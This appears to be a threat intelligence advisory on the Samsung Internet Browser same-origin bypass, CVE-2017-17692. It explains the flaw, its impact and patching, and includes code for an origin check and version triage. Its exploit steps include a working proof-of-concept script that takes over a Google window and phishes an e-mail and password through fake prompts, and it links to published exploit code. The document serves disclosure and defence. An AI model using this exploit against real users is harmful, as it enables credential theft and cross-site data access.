TACTICAL CYBER INTELLIGENCE REPORT

Actor Type: II
Serial: TR-18-003-002
Countries: IN, CN
Report Date: 20180101

 

Samsung Browser “Same Origin Policy” bypass vulnerability

On 27 December 2017, a critical vulnerability was reported in Samsung Internet Browser, the browser app that comes pre-installed on Samsung Android devices.  The vulnerability could allow an attacker to steal data from browser tabs if the user visits an attacker-controlled site.

The vulnerability, tracked as CVE-2017-17692 and described as a "Same Origin Policy (SOP) bypass," affects Samsung Internet Browser versions 5.4.02.3 and earlier.[1]  Samsung Internet Browser users should confirm that the installed version is later than 5.4.02.3 and, if it is not, update the application at once.

Analysis:

The Samsung Internet Browser comes pre-installed on hundreds of millions of devices.  Every one of these devices still running an affected version is exposed to this attack.

The Same Origin Policy is a core browser security control.  A script running in one page may read or modify the contents of a second page (for example, a window it has opened) only if both pages share the same origin, where the origin is the combination of scheme, host and port[2].  This lets pages on the same site interact freely while preventing a site from reading, or interfering with, content served by another site.  A SOP bypass therefore lets a page controlled by an attacker script pages from any other origin.
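As an added illustration of the rule described above (example code written for this report, not Samsung's browser code and not the published exploit), the following JavaScript computes the origin tuple of a URL and applies the same-origin check a compliant browser performs before it lets an opener script touch the document of a window it opened.  The URL pairs are constructed samples and the host attacker.example is a placeholder.

```javascript
// Added example: the same-origin check as a compliant browser applies it.
// Not code from the report or from Samsung; URLs below are constructed samples.

// Default ports per scheme, so "https://host" and "https://host:443" match.
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Origin tuple of a URL: [scheme, host, effective port]. Path, query and
// fragment are deliberately ignored; they play no part in the origin.
function originOf(urlString) {
  const u = new URL(urlString);
  // The URL parser drops a default port, so fill it back in for comparison.
  const port = u.port !== "" ? u.port : (DEFAULT_PORTS[u.protocol] || "");
  return [u.protocol, u.hostname, port];
}

// Two URLs are same-origin only if all three components agree.
function sameOrigin(a, b) {
  const [sa, ha, pa] = originOf(a);
  const [sb, hb, pb] = originOf(b);
  return sa === sb && ha === hb && pa === pb;
}

// Model of the decision a compliant browser takes when a script in the
// opener page (openerUrl) touches childWindow.document of a window it
// opened (childUrl). A SOP bypass is a browser that returns "allow" where
// this returns "block".
function documentAccess(openerUrl, childUrl) {
  return sameOrigin(openerUrl, childUrl) ? "allow" : "block";
}

// Constructed sample pairs, including the pair used in the published
// exploit (attacker page -> https://www.google.com/csi).
const SAMPLE_PAIRS = [
  ["https://attacker.example/spoof.html", "https://www.google.com/csi"],     // different host
  ["https://www.google.com/",            "https://www.google.com:443/csi"], // same origin, explicit default port
  ["http://www.google.com/",             "https://www.google.com/"],        // different scheme
  ["https://google.com/",                "https://www.google.com/"],        // different host (subdomain)
  ["https://www.google.com/",            "https://www.google.com:8443/"],   // different port
];

// Returns [opener, child, verdict] for each sample pair.
function evaluateSamples() {
  return SAMPLE_PAIRS.map(([opener, child]) => [opener, child, documentAccess(opener, child)]);
}

for (const [opener, child, verdict] of evaluateSamples()) {
  console.log(`${verdict.padEnd(5)} ${opener} -> ${child}`);
}
```

Only the second pair, the same site over HTTPS with the default port written out, is allowed; the first pair is the comparison the affected build failed to apply to the opener's window reference.  A real browser exposes the same tuple as `new URL(u).origin`; the three components are spelled out here so that the check is visible.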

The Same Origin Policy (SOP) bypass is tracked as CVE-2017-17692 and is present in Samsung Internet Browser 5.4.02.3 and earlier versions[3].  The application has more than 100 million downloads on the Play Store and supports Android 5.0 (Lollipop) and above.  The flaw lies in the browser, not in Android itself, so every supported Android version running an affected browser build is vulnerable.  Details about the application can be found at https://play.google.com/store/apps/details?id=com.sec.android.app.sbrowser.

An attack requires nothing more than a web page that the victim opens in an affected browser version.  Below are the steps to exploit the vulnerability:

  1. Create a simple page, e.g. spoof.html, containing the following code snippet:

<script>
// Opens a cross-origin page in a new window and, three seconds later (once it
// has loaded), rewrites that window's document and shows login prompts that
// appear to belong to google.com.  In a compliant browser every access to
// x.document and x.prompt below throws a SecurityError; the affected Samsung
// build allows them.
function go(){
  var x = window.open('https://www.google.com/csi');
  setTimeout(function(){
    x.document.body.innerHTML = '<h1>Please login</h1>';  // cross-origin write
    var a = x.prompt('E-mail', '');                       // prompt shown for the google.com window
    var b = x.prompt('Password', '');
    alert('E-mail: ' + a + '\nPassword: ' + b);           // values land back in the attacker's tab
  }, 3000);
}
</script>
<button onclick="go()">go</button>

  2. Open spoof.html in the affected browser and tap the "go" button.
  3. A new tab opens https://www.google.com/csi.  Because the browser fails to apply the Same Origin Policy to the opener's window reference, the script in spoof.html keeps full access to the new tab's document.
  4. After three seconds the script replaces the body of the Google page and calls prompt() from the google.com window, producing a fake "Please login" page and prompts that appear to come from google.com.
  5. The e-mail and password the victim enters are returned to the script in the attacker's tab, which displays them here and would exfiltrate them in a real attack.  Both the cross-origin write and the cross-origin read should have been blocked by the Same Origin Policy.

The complete exploit code is available at: https://datarift.blogspot.in/p/samsung-interent-browser-sop-bypass-cve.html.

A Metasploit module has also been published and is included in the Metasploit framework; copies of the exploit are available at https://www.exploit-db.com/exploits/43376/ and https://fr.0day.today/exploit/28434.  An attack video can be viewed at: https://www.youtube.com/watch?v=lpkbogxJXnw

Impact: An attacker can inject arbitrary JavaScript into pages of any origin that the attacker's page has opened, redirect the victim to malicious pages, and read page content and session cookies (those not marked HttpOnly) from other tabs open in the browser.  This gives unauthorized access to the victim's confidential information, including the ability to read and send webmail on the victim's behalf.

Mitigation and Preventive Measures:  The vulnerability has already been reported to Samsung.  Samsung has replied, “the patch is already preloaded in our upcoming model Galaxy Note 8, and the application will be updated via an Apps store update in October."

Red Sky Alliance customers are therefore advised to update Samsung Internet Browser to the latest version.  To check the installed version, open the browser's Settings -> About Samsung Internet.  The version shown should be greater than 5.4.02.3; if it is not, update the application at once.
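As an added worked example of the version check above (code written for this report, not Samsung's or the exploit author's), the following JavaScript compares dotted version strings component by component against the report's 5.4.02.3 threshold and triages browser User-Agent strings server-side.  The version and User-Agent strings are constructed samples, and the "SamsungBrowser/<major>.<minor>" token format is an assumption based on public Samsung Internet User-Agent strings; confirm it against your own logs.

```javascript
// Added example, not part of the original report.  Sample version and
// User-Agent strings are constructed; the SamsungBrowser/<major>.<minor>
// UA token format is assumed from public Samsung Internet UA strings.

const LAST_VULNERABLE = "5.4.02.3"; // threshold from the report: fixed builds are greater than this

// Split a dotted version into integers so that "02" equals 2 and "10"
// sorts after "2" (a plain string comparison would get the latter wrong).
function parseVersion(s) {
  if (!/^\d+(\.\d+)*$/.test(s)) throw new Error("bad version string: " + s);
  return s.split(".").map(Number);
}

// Component-wise comparison; missing trailing components count as 0, so
// "6.2" equals "6.2.0.0".  Returns -1, 0 or 1.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] || 0, y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// A build is affected when it is at or below the last vulnerable version.
function isVulnerable(installed) {
  return compareVersions(installed, LAST_VULNERABLE) <= 0;
}

// Extract "<major>.<minor>" from a SamsungBrowser User-Agent token, or null.
function samsungBrowserVersion(ua) {
  const m = /SamsungBrowser\/(\d+\.\d+)/.exec(ua);
  return m ? m[1] : null;
}

// Server-side triage from the User-Agent alone.  The UA carries only
// major.minor, so a 5.4 build cannot be distinguished from the 5.4.02.3
// threshold: report it as "possibly-vulnerable" rather than guessing.
function triageUserAgent(ua) {
  const v = samsungBrowserVersion(ua);
  if (v === null) return "not-samsung-browser";
  const c = compareVersions(v, "5.4");
  if (c < 0) return "vulnerable";
  if (c === 0) return "possibly-vulnerable";
  return "not-affected";
}

// Constructed sample User-Agent strings.
const SAMPLE_UAS = [
  "Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G930F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36",
  "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-N950F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/6.2 Chrome/56.0.2924.87 Mobile Safari/537.36",
  "Mozilla/5.0 (Linux; Android 8.0.0; Pixel 2 Build/OPD1.170816.004) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36",
];

for (const ua of SAMPLE_UAS) {
  console.log(triageUserAgent(ua).padEnd(20), samsungBrowserVersion(ua) || "-");
}
```

isVulnerable() is the check to run against the full version shown under About Samsung Internet on the device; triageUserAgent() is only a coarse first pass for web server logs, because the User-Agent never carries the build components that decide whether a 5.4 install is at or past 5.4.02.3.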

 

Contact the Wapack Labs for more information: 603-606-1246, or feedback@wapacklabs.com.

 

[1] https://thehackernews.com/2017/12/same-origin-policy-bypass.html

[2] https://en.wikipedia.org/wiki/Same-origin_policy

[3] https://datarift.blogspot.in/p/samsung-interent-browser-sop-bypass-cve.html
